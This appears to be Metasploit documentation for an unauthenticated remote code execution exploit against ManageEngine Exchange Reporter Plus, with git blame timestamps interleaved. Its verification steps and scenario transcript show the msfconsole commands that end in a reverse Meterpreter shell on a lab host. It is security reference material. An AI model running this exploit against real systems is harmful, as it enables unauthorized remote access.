2018-07-02 19:10:34 +02:00
## Description
This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet.
2022-10-07 14:35:21 -04:00
Additional information can be viewed on https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/
2018-07-02 19:10:34 +02:00
2020-01-16 10:49:22 -05:00
## Verification Steps
2018-07-02 19:10:34 +02:00
[Exchange Reporter Plus 5216 ](https://mega.nz/#!XG5CTC5I!IuG91CbrcdcpQj4teYRiBWNwy9pULRkV69U3DQ6nCyU )
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/http/manageengine_adshacluster_rce`
4. Do: `set rhost <ip>`
5. Do: `check`
```
[*] Version: 5216
[+] 192.168.88.125:8181 The target is vulnerable.
```
6. Do: `set lport <port>`
7. Do: `set lhost <ip>`
8. Do: `exploit`
9. You should get a shell.
## Scenarios
### Exchange Reporter Plus 5216 on Windows Target
```
msf > use exploit/windows/http/manageengine_adshacluster_rce
msf exploit(windows/http/manageengine_adshacluster_rce) > set rhost 192.168.88.125
rhost => 192.168.88.125
msf exploit(windows/http/manageengine_adshacluster_rce) > check
[*] Version: 5216
[+] 192.168.88.125:8181 The target is vulnerable.
msf exploit(windows/http/manageengine_adshacluster_rce) > set lport 1111
lport => 1111
msf exploit(windows/http/manageengine_adshacluster_rce) > set lhost 192.168.88.120
lhost => 192.168.88.120
msf exploit(windows/http/manageengine_adshacluster_rce) > exploit
[*] Started reverse TCP handler on 192.168.88.120:1111
[*] Sending stage (179779 bytes) to 192.168.88.125
[*] Meterpreter session 2 opened (192.168.88.120:1111 -> 192.168.88.125:49955) at 2018-07-02 18:58:01 +0200
meterpreter > sysinfo
Computer : WIN10
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : pl_PL
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
` ``
